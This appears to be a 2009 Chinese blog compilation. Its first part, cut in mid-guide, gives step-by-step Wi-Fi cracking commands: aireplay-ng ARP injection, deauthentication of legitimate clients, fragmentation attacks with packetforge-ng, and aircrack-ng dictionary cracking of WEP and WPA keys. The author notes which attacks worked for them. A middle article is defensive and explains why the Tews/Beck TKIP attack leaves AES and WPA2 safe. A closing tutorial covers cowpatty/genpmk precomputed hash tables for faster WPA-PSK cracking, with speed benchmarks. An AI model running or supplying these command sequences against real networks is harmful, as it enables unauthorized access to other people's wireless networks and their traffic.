5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)
,send 71524 packets ... 很多类似行>
c.合法客户端不在通信，注入模式不成功，
用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，
新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0
(可能要另开窗)
d.有客户端，并且客户端能产生有效arp 数据的另类破解方式
输入modprobe –r iwl3945
(加载网卡)
输入modprobe ipwraw
输入airmon-ng start wlan0 6
现在，只要一个命令就搞定，输入:
输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。

二、无客户端：
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
(我成功了)
另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0

(建立虚拟伪装连接)
如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)
破解:abcd四种方式
a.-2 crack mode ---------------
建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
发包成功后可得到足够的ivs，然后用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步骤?>
c.-4 crack mode ---------------
-4攻击模式；制造数据包；-2交互式攻击模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
(提取上面xor 文件来伪造一个arp包)
8.aireplay-ng -2 -r myarp mon0
一说用aireplay-ng -2 -r myarp -x 512 mon0
(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)
9.用aircrack-ng破解
d.-5 crack mode ---------------
-5碎片攻击模式；制造数据包；-2交互式攻击模式
(我成功过)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0

(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
(Myarp随便起的文件名)

8.aireplay-ng -2 -r myarp -x 256/512 mon0

(这时，前面的抓包窗口上的data 将迅速增加)
(512是攻击速度，1024是最大值)
9.采用aircrack-ng 来进行破解
shell 3:----------------------------------------
aircrack-ng *.cap
如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs
(我成功了)
另一说用aircrack-ng -n 64 -b APmac pack-01.cap
>
附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4\modules\下,启动BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<显示bash为成功,dash为失败>
3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，
关闭一下spoonwep2再重启spoonwep2，
这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密
码的出来(sata数据包到30000个左右)。
(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)
---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a

2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6

(6是频道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
(保存名为12345.cap)
(-w：写入文件，-c：截取cap的频道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)
<18:56:20 Sending 64 directed DeAuth,... 一些类似行>
(-c后面为合法无线客户端的MAC地址)
(迫使AP重新与已连接的合法客户端重新握手验证)
(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万，
因为它只要一个包含WPA握手验证包就可以了)
Cap数据包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
另一说是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
(
-w：是字典破解模式
Password.txt是你事先准备好的字典。
技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认
的工作目录在/root）。
请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。
)
c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解
启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...

d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)
(Windows版本操作步骤与其Linux下版本完全一致)
(
参数解释：
-f 这里跟上采用的字典
-d 生成的Table文件名称
-s 目标AP的ESSID
)
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
(
参数解释：
-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash
-r 事先捕获的WPA握手数据包
-s 目标AP的ESSID
)
---------------------end---------------------
WPA破解，怎么知道有握手包被截获？
airodump-ng监视窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65
BT4抓包后，cap文件保存在哪？
输入ls可以看到啊,默认在root下。
如何获得合法端mac？
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用
Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据
包解密方可看到客户端MAC。
前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac
BSSID STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb
如何查找隐藏的SSID？
1.在BT4下先打开一个shell,输入
airodump-ng 网卡端口
2.打开另一个shell,输入
aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口
可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止
3.然后就可以在上个shell,看到显示出来的SSID。

无线通讯加密技术WPA被破解

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:06:55 GMT

最近几日网上有很多关于无线通讯加密技术WPA被破解的文章，观其内容不外乎提到了WPA加密技术能够在十几分钟内被破解的话题，那么无线通讯真的不再安全了吗？WPA真的如文章所说成为继WEP技术后第二个“投诚”的加密手段吗？今天就请各位IT168读者睁大眼睛切勿断章取意跟随笔者一起细品WPA被破解的真实内容，看看WPA是否真的如文章所说一无事处。
一、WPA被破解全过程：
研究员ErikTews将在东京的PacSec大会上，演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解，而WPA作为WEP的替代者在以往安全等多个方面的表现相当不错。
EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据，Tews找到了无需用字典攻击法，来破解临时密钥完整性协议（TKIP）的方法。本次破解将给用户和厂商带来巨大的影响。WPA是目前最普遍的加密标准之一，而且还有更可靠的标准WPA2（它使用的是高级加密标准AES，所以不会受到该破解的影响），但是它还不是很成熟。用户只能被迫停留在不安全的WPA加密技术上。
由于WPA2技术在很多设备上都无法顺利运行，很多设备不支持WPA2加密，所以到目前为止最好的看似最安全的技术就要属WPA了，但是随着本次WPA被破解恐怕没有再好的技术让我们放心使用无线网络了。
二、切勿断章取意细品WPA被破事件：
那么是否WPA被破解后无线网络的安全就真的没有任何保障了吗？基于WPA加密的无线网络是否真的有如一层窗户纸一样被轻易桶破呢？下面笔者就来仔细分析下本次针对WPA加密通讯破解的来龙去脉。
（1）WPA所用的TKIP密钥并未被破解：
根据Tews/Beck的方法，攻击者嗅探数据包，略作修改影响校检，校检的结果会寄回接入点，允许攻击者解密个别的数据包。不过这种攻击只对短数据包有效，长数据包仍然很安全，TKIP并没有破解，但攻击能引起地址解析协议（AddressResolutionProtocol，ARP）中毒和可能的DNS(域名服务)欺骗或中毒。
所以说这种攻击虽然可以获取数据包内容，但是TKIP这个关键的密钥信息并没有真正的还原出来，所以WPA无线网络不能认为是彻底不安全，毕竟仅仅还原出TKIP加密过的数据包没有太大意义，网络中很多通讯都已经针对数据包进行了加密。这种破解只相当于把一个里三层外三层包裹得非常严实的物品拆开其中的一层包装而已。还原出来的数据包还是被相关网络服务与网络应用所加密过的。
小结——WPA通讯数据包能够被窃取还原会原数据包，但是入侵者无法将TKIP这个重要密钥破解。入侵者只能够获得通讯数据包，无法对无线路由器进行入侵。
（2）AES密钥依然非常安全：
说到WPA加密使用过他的用户都知道我们可以在密钥类型上有三种选择，依次为TKIP，AES以及TKIP+AES，而本次发布的破解仅仅是针对TKIP加密方式的，因此我们完全可以修改WPA加密方式转换为AES类别，这样就会变得非常安全。
小提示：
在加密时如果为了确保安全我们不要选择TKIP+AES这种方式，因为此方式是应用两种加密密钥都可以，所以还是会存在TKIP加密的情况，从而带来安全问题。
小结——WPA加密被破解仅仅是针对TKIP密钥而言，我们只要修改密钥加密方式为AES加密就可以有效解决安全问题，让WPA加密非常安全。
（3）WPA2安然无恙：
除了上述所说的两点外就算是WPA被彻底破解，我们的无线安全也不是一无事处的，要知道除了WPA外我们还可以使用更高级别的WPA2方式来加密无线网络通讯数据，相比WPA加密方式WPA2被破解的难度更大，这是因为相比从WEP到WPA仅仅通过软件升级不同的是，从WPA到WPA2的升级是基于硬件的提升，这样就从根本上提高了网络通讯的安全。不过随之而来的就是一些网络无线设备会因为硬件问题而无法与WPA2兼容。
小结——WPA2相比WPA加密方式要安全很多，因此就算WPA不安全我们也可以通过WPA2对通讯加密，防止无线入侵者攻击无线网络。
（4）无线路由器安然无恙：
正如上文所说Tews/Beck的方法是攻击者嗅探数据包，略作修改影响校检，校检的结果会寄回接入点，允许攻击者解密个别的数据包。不过这种攻击只对短数据包有效，长数据包仍然很安全，TKIP并没有破解，所以说在这种情况下无线路由器是安全的。由于TKIP信息没有被破解，因此入侵者的无线设备是不可能被成功接入到WPA加密的无线网络中，所以无线路由器以及内网其他无线设备都是安全的。入侵者能够做的只是还原出数据信息而不是越权攻击网络。
小结——Tews/Beck的方法只能够让入侵者成为一个旁观者浏览通讯数据包信息而无法让他们成为一个真正的使用者来连接WPA加密过的无线网络。所以说在这种情况下WPA网络内的无线路由器以及各个无线客户端是相对安全的。
三、总结：
从本文的分析可以看出虽然Tews/Beck提供了获取WPA加密数据包原文的方法，但是这种方法还不能够算真正意义上的破解WPA，作为WPA加密过程中的核心TKIP密钥没有被破解，所以WPA网络自身还是安全的，另外我们还可以借助AES以及WPA2等多方式解决此问题。总之WPA被破事件并没有像网络上炒作的那么邪乎，希望各位读者可以通过本文了解事件真像，切勿断章取意。

利用PMK Hash进行WPA/WPA2高速破解(图)

769626132@qq.com(津津精品) — Tue, 17 Nov 2009 14:03:55 GMT

本文涉及Hash主要基于Cowpatty下的genpmk工具制作，这是ZerOne安全团队无线安全组通过与Aircrack-ng的airolib-ng及相关工具的便捷性、通用性反复对比后最终决定的。为方便大家学习，下面讲述一下基本的WPA PMK Hash制作方法及在进行WPA-PSK/WPA2-PSK破解时的Hash的使用方法。　　1.Hash制作篇
　　以下涉及工具的Windows版本操作步骤与其Linux下版本完全一致，大家对照进行即可。
　　具体步骤：在进入到Linux Shell / Windows Command下后，先使用genpmk这个工具来构建预运算Hash Table，这里需要指定针对目标的ESSID，命令如下：
　　genpmk -f dictionary -d hash -s SSID
　　参数解释：
　　-f 这里跟上采用的字典
　　-d 生成的Table文件名称
　　-s 目标AP的ESSID
　　

　　2.Hash使用篇
　　具体步骤：在进入到Linux Shell / Windows Command下后，使用cowpatty这个工具来导入WPA预运算Hash Table，这里仍需要指定针对目标的ESSID，命令如下：
　　cowpatty –d Hash -r *.cap -s SSID
　　参数解释：
　　-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash
　　-r 事先捕获的WPA握手数据包
　　-s 目标AP的ESSID
　　

　　3.测试数据对比
　　测试环境：
　　OS： Windows XP SP3
　　CPU： Intel双核 T7100
　　内存： 2.5GB
　　一般字典模式下，平均破解速率为57.28 key /秒，如下图：
　　

　　使用WPA Hash Table模式下，平均破解速率为71566.66 key/秒，如下图：
　　

　　通过对比可以看到，破解速率提升了不止数倍，而是原先的近1300倍!!以上是Cowpatty所使用的WPA PMK Hash Table破解实现及效果。
　　4.测试数据对比
　　